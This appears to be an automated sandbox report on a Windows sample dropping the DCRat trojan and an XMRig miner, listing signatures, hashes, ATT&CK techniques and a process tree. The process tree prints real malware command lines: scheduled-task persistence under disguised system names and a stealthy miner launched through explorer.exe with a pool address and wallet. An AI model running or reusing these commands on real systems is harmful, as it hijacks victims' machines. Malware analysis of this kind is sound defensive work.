Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-07-2021 22:46

General

  • Target

    Software v3.0.5.exe

  • Size

    910KB

  • MD5

    56d73f0b8c89094a9f0ad6277f042b3d

  • SHA1

    6efe8b8257f030fdb63a069aad558b6282310a31

  • SHA256

    c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e

  • SHA512

    6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • DCRat Payload 8 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
    "C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Users\Admin\AppData\Roaming\Dcr.exe
      C:\Users\Admin\AppData\Roaming\Dcr.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:340
          • C:\fonthostSvc\fonthostSvcIntodhcp.exe
            "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
            5⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:576
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Windows\System32\wbem\nci\WMIADAP.exe'" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1768
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1092
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDROST\cmd.exe'" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1940
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1580
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_866\taskhost.exe'" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1804
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1568
            • C:\MSOCache\All Users\dwm.exe
              "C:\MSOCache\All Users\dwm.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              PID:1520
    • C:\Users\Admin\AppData\Roaming\etc.exe
      C:\Users\Admin\AppData\Roaming\etc.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1228
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1456
      • C:\Users\Admin\AppData\Roaming\services32.exe
        "C:\Users\Admin\AppData\Roaming\services32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
          4⤵
            PID:1836
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
              5⤵
              • Creates scheduled task(s)
              PID:1424
          • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
            4⤵
            • Executes dropped EXE
            PID:948
      • C:\Users\Admin\AppData\Roaming\xmr.exe
        C:\Users\Admin\AppData\Roaming\xmr.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            4⤵
            • Creates scheduled task(s)
            PID:1712
        • C:\Users\Admin\AppData\Roaming\services64.exe
          "C:\Users\Admin\AppData\Roaming\services64.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1796
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
            4⤵
              PID:804
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                5⤵
                • Creates scheduled task(s)
                PID:512
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              4⤵
              • Executes dropped EXE
              PID:920
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1492

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Install Root Certificate

      1
      T1130

      Modify Registry

      1
      T1112

      Credential Access

      Credentials in Files

      2
      T1081

      Discovery

      System Information Discovery

      1
      T1082

      Collection

      Data from Local System

      2
      T1005

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\MSOCache\All Users\dwm.exe
        MD5

        8cf49d252229ed14a26b9a2b45771e1d

        SHA1

        d53682e13e1f6a1a619c0d1780d86479d388bf0c

        SHA256

        45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

        SHA512

        808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

      • C:\MSOCache\All Users\dwm.exe
        MD5

        8cf49d252229ed14a26b9a2b45771e1d

        SHA1

        d53682e13e1f6a1a619c0d1780d86479d388bf0c

        SHA256

        45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

        SHA512

        808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        MD5

        2902de11e30dcc620b184e3bb0f0c1cb

        SHA1

        5d11d14a2558801a2688dc2d6dfad39ac294f222

        SHA256

        e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

        SHA512

        efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
        MD5

        d474de575c39b2d39c8583c5c065498a

        SHA1

        5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

        SHA256

        7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf

        SHA512

        7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        MD5

        9957b5416f7df4730175f4431e3ec3bb

        SHA1

        46f8a6512ab3b74193b2430bf012de089dbd91ff

        SHA256

        6ff4153467bfa703c0cdb65b6ebfb5579aa152d9ce7ad4617b57ac6bf1d5ba9d

        SHA512

        6db4adb54b62b63b77c146806c0e3bb78154f2fe3ccf36d0b46264dc2b4618c3aa74bd6dc11a942093e05afa9b155a9568da7c9bee07895905c2661ed59c0d1c

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        MD5

        468b7619b5a8af699a133b7ee2c82e23

        SHA1

        2275492369fbd85b98aabeec27a59554c92a2a6d

        SHA256

        26bc1d832eae3c001f348498276a2fd0d1d47b5e0ba0b6e70c5e10635fd0a041

        SHA512

        375dc15875e6eb240732080fe1fdee0423c458019238d0d8f31bd08b8bbef490a5dbca83f2785a5bd7f81487f7cb0a0b054a59476b7b53d120cdc32898223289

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
        MD5

        c6285451c9d7d6e7ae818083ccfb9023

        SHA1

        f3b7777c9d42665a549c404fcae4b15e0a1603c2

        SHA256

        d5a46974275cb760470d73c410956a4bc1edc0ae37e39b3afbd390ae51f2abbb

        SHA512

        afff1923bf7d273fd1f06575f0e7d6f53d1f5f07428ad389d50e22af4dd0a1ce0c1b24e89508010386e66a19b61fe4b742f5981b081dc3337635360a3e891f00

      • C:\Users\Admin\AppData\Roaming\Dcr.exe
        MD5

        975a0ad02701f9f528784dee5a9728d2

        SHA1

        8a3b57da095dd6fc9d61fe004c1025d929370515

        SHA256

        b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

        SHA512

        6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

      • C:\Users\Admin\AppData\Roaming\Dcr.exe
        MD5

        975a0ad02701f9f528784dee5a9728d2

        SHA1

        8a3b57da095dd6fc9d61fe004c1025d929370515

        SHA256

        b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

        SHA512

        6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        89c453dbd36f561195de8e5c5dce77a0

        SHA1

        8cc44dd7646ec89b6c22214614a8cab158e47f0c

        SHA256

        ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

        SHA512

        c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        89c453dbd36f561195de8e5c5dce77a0

        SHA1

        8cc44dd7646ec89b6c22214614a8cab158e47f0c

        SHA256

        ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

        SHA512

        c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        MD5

        7059ba6625325156b764224d2b2dbd83

        SHA1

        4cc34def0b7d39b913559f539e6d58a3e363f2e3

        SHA256

        04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

        SHA512

        ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        MD5

        7059ba6625325156b764224d2b2dbd83

        SHA1

        4cc34def0b7d39b913559f539e6d58a3e363f2e3

        SHA256

        04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

        SHA512

        ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

      • C:\Users\Admin\AppData\Roaming\etc.exe
        MD5

        b07420edcab9bae1bb3fe4befc7ee57c

        SHA1

        41ae0d56b863d8155865548e8231e1994e197c21

        SHA256

        2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

        SHA512

        584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

      • C:\Users\Admin\AppData\Roaming\etc.exe
        MD5

        b07420edcab9bae1bb3fe4befc7ee57c

        SHA1

        41ae0d56b863d8155865548e8231e1994e197c21

        SHA256

        2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

        SHA512

        584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

      • C:\Users\Admin\AppData\Roaming\services32.exe
        MD5

        b07420edcab9bae1bb3fe4befc7ee57c

        SHA1

        41ae0d56b863d8155865548e8231e1994e197c21

        SHA256

        2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

        SHA512

        584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

      • C:\Users\Admin\AppData\Roaming\services32.exe
        MD5

        b07420edcab9bae1bb3fe4befc7ee57c

        SHA1

        41ae0d56b863d8155865548e8231e1994e197c21

        SHA256

        2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

        SHA512

        584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

      • C:\Users\Admin\AppData\Roaming\services64.exe
        MD5

        f99c879d74bf1355905734a411191276

        SHA1

        103a41ade035585e4834f7b939e15608fb64d201

        SHA256

        eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

        SHA512

        e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

      • C:\Users\Admin\AppData\Roaming\services64.exe
        MD5

        f99c879d74bf1355905734a411191276

        SHA1

        103a41ade035585e4834f7b939e15608fb64d201

        SHA256

        eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

        SHA512

        e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

      • C:\Users\Admin\AppData\Roaming\xmr.exe
        MD5

        f99c879d74bf1355905734a411191276

        SHA1

        103a41ade035585e4834f7b939e15608fb64d201

        SHA256

        eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

        SHA512

        e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

      • C:\Users\Admin\AppData\Roaming\xmr.exe
        MD5

        f99c879d74bf1355905734a411191276

        SHA1

        103a41ade035585e4834f7b939e15608fb64d201

        SHA256

        eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

        SHA512

        e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

      • C:\fonthostSvc\5R3FFGftzpp.vbe
        MD5

        cb60c41590dc32740e8923ba0cb6df97

        SHA1

        aabc007b611df20e79fceee539ef63e7f2754304

        SHA256

        c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2

        SHA512

        a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

      • C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
        MD5

        7245c594f9448bae4a79764fb6897e25

        SHA1

        1eb300765111494f6c7049b5abbbb0e5725b39aa

        SHA256

        4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5

        SHA512

        26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8

      • C:\fonthostSvc\fonthostSvcIntodhcp.exe
        MD5

        8cf49d252229ed14a26b9a2b45771e1d

        SHA1

        d53682e13e1f6a1a619c0d1780d86479d388bf0c

        SHA256

        45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

        SHA512

        808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

      • C:\fonthostSvc\fonthostSvcIntodhcp.exe
        MD5

        8cf49d252229ed14a26b9a2b45771e1d

        SHA1

        d53682e13e1f6a1a619c0d1780d86479d388bf0c

        SHA256

        45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

        SHA512

        808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

      • \Users\Admin\AppData\Roaming\Dcr.exe
        MD5

        975a0ad02701f9f528784dee5a9728d2

        SHA1

        8a3b57da095dd6fc9d61fe004c1025d929370515

        SHA256

        b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

        SHA512

        6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

      • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        89c453dbd36f561195de8e5c5dce77a0

        SHA1

        8cc44dd7646ec89b6c22214614a8cab158e47f0c

        SHA256

        ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

        SHA512

        c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

      • \Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        MD5

        7059ba6625325156b764224d2b2dbd83

        SHA1

        4cc34def0b7d39b913559f539e6d58a3e363f2e3

        SHA256

        04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

        SHA512

        ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

      • \Users\Admin\AppData\Roaming\etc.exe
        MD5

        b07420edcab9bae1bb3fe4befc7ee57c

        SHA1

        41ae0d56b863d8155865548e8231e1994e197c21

        SHA256

        2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

        SHA512

        584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

      • \Users\Admin\AppData\Roaming\services32.exe
        MD5

        b07420edcab9bae1bb3fe4befc7ee57c

        SHA1

        41ae0d56b863d8155865548e8231e1994e197c21

        SHA256

        2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

        SHA512

        584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

      • \Users\Admin\AppData\Roaming\services64.exe
        MD5

        f99c879d74bf1355905734a411191276

        SHA1

        103a41ade035585e4834f7b939e15608fb64d201

        SHA256

        eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

        SHA512

        e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

      • \Users\Admin\AppData\Roaming\xmr.exe
        MD5

        f99c879d74bf1355905734a411191276

        SHA1

        103a41ade035585e4834f7b939e15608fb64d201

        SHA256

        eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

        SHA512

        e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

      • \fonthostSvc\fonthostSvcIntodhcp.exe
        MD5

        8cf49d252229ed14a26b9a2b45771e1d

        SHA1

        d53682e13e1f6a1a619c0d1780d86479d388bf0c

        SHA256

        45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

        SHA512

        808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

      • memory/340-82-0x0000000000000000-mapping.dmp
      • memory/512-129-0x0000000000000000-mapping.dmp
      • memory/576-84-0x0000000000000000-mapping.dmp
      • memory/576-87-0x00000000001B0000-0x00000000001B1000-memory.dmp
        Filesize

        4KB

      • memory/576-89-0x000000001AE90000-0x000000001AE92000-memory.dmp
        Filesize

        8KB

      • memory/804-128-0x0000000000000000-mapping.dmp
      • memory/836-62-0x0000000000000000-mapping.dmp
      • memory/920-132-0x0000000000000000-mapping.dmp
      • memory/920-145-0x000000001BC10000-0x000000001BC12000-memory.dmp
        Filesize

        8KB

      • memory/920-135-0x000000013FD90000-0x000000013FD91000-memory.dmp
        Filesize

        4KB

      • memory/948-141-0x000000013F930000-0x000000013F931000-memory.dmp
        Filesize

        4KB

      • memory/948-137-0x0000000000000000-mapping.dmp
      • memory/948-155-0x000000001ACB0000-0x000000001ACB2000-memory.dmp
        Filesize

        8KB

      • memory/1092-91-0x0000000000000000-mapping.dmp
      • memory/1100-60-0x00000000757D1000-0x00000000757D3000-memory.dmp
        Filesize

        8KB

      • memory/1228-70-0x000000013F320000-0x000000013F321000-memory.dmp
        Filesize

        4KB

      • memory/1228-65-0x0000000000000000-mapping.dmp
      • memory/1228-112-0x0000000002030000-0x0000000002032000-memory.dmp
        Filesize

        8KB

      • memory/1228-106-0x0000000000C00000-0x0000000000C06000-memory.dmp
        Filesize

        24KB

      • memory/1424-130-0x0000000000000000-mapping.dmp
      • memory/1456-110-0x0000000000000000-mapping.dmp
      • memory/1492-152-0x00000001402EB66C-mapping.dmp
      • memory/1492-151-0x0000000140000000-0x0000000140758000-memory.dmp
        Filesize

        7.3MB

      • memory/1492-153-0x0000000000270000-0x0000000000290000-memory.dmp
        Filesize

        128KB

      • memory/1492-158-0x0000000000680000-0x00000000006A0000-memory.dmp
        Filesize

        128KB

      • memory/1492-154-0x0000000140000000-0x0000000140758000-memory.dmp
        Filesize

        7.3MB

      • memory/1492-157-0x00000000003D0000-0x00000000003F0000-memory.dmp
        Filesize

        128KB

      • memory/1492-156-0x00000000003D0000-0x00000000003F0000-memory.dmp
        Filesize

        128KB

      • memory/1520-104-0x000000001AA10000-0x000000001AA12000-memory.dmp
        Filesize

        8KB

      • memory/1520-102-0x0000000000410000-0x0000000000415000-memory.dmp
        Filesize

        20KB

      • memory/1520-96-0x0000000000000000-mapping.dmp
      • memory/1520-99-0x0000000001340000-0x0000000001341000-memory.dmp
        Filesize

        4KB

      • memory/1520-103-0x0000000000430000-0x0000000000432000-memory.dmp
        Filesize

        8KB

      • memory/1520-101-0x000000001B320000-0x000000001B322000-memory.dmp
        Filesize

        8KB

      • memory/1568-95-0x0000000000000000-mapping.dmp
      • memory/1580-93-0x0000000000000000-mapping.dmp
      • memory/1684-78-0x0000000000000000-mapping.dmp
      • memory/1712-109-0x0000000000000000-mapping.dmp
      • memory/1768-90-0x0000000000000000-mapping.dmp
      • memory/1796-143-0x0000000002320000-0x0000000002322000-memory.dmp
        Filesize

        8KB

      • memory/1796-121-0x000000013F1B0000-0x000000013F1B1000-memory.dmp
        Filesize

        4KB

      • memory/1796-115-0x0000000000000000-mapping.dmp
      • memory/1804-94-0x0000000000000000-mapping.dmp
      • memory/1836-127-0x0000000000000000-mapping.dmp
      • memory/1836-108-0x0000000000000000-mapping.dmp
      • memory/1844-107-0x0000000000000000-mapping.dmp
      • memory/1932-144-0x000000001B200000-0x000000001B202000-memory.dmp
        Filesize

        8KB

      • memory/1932-122-0x000000013F2D0000-0x000000013F2D1000-memory.dmp
        Filesize

        4KB

      • memory/1932-116-0x0000000000000000-mapping.dmp
      • memory/1940-92-0x0000000000000000-mapping.dmp
      • memory/1948-68-0x0000000000000000-mapping.dmp
      • memory/1948-111-0x000000001C830000-0x000000001C832000-memory.dmp
        Filesize

        8KB

      • memory/1948-105-0x0000000000560000-0x0000000000569000-memory.dmp
        Filesize

        36KB

      • memory/1948-74-0x000000013F720000-0x000000013F721000-memory.dmp
        Filesize

        4KB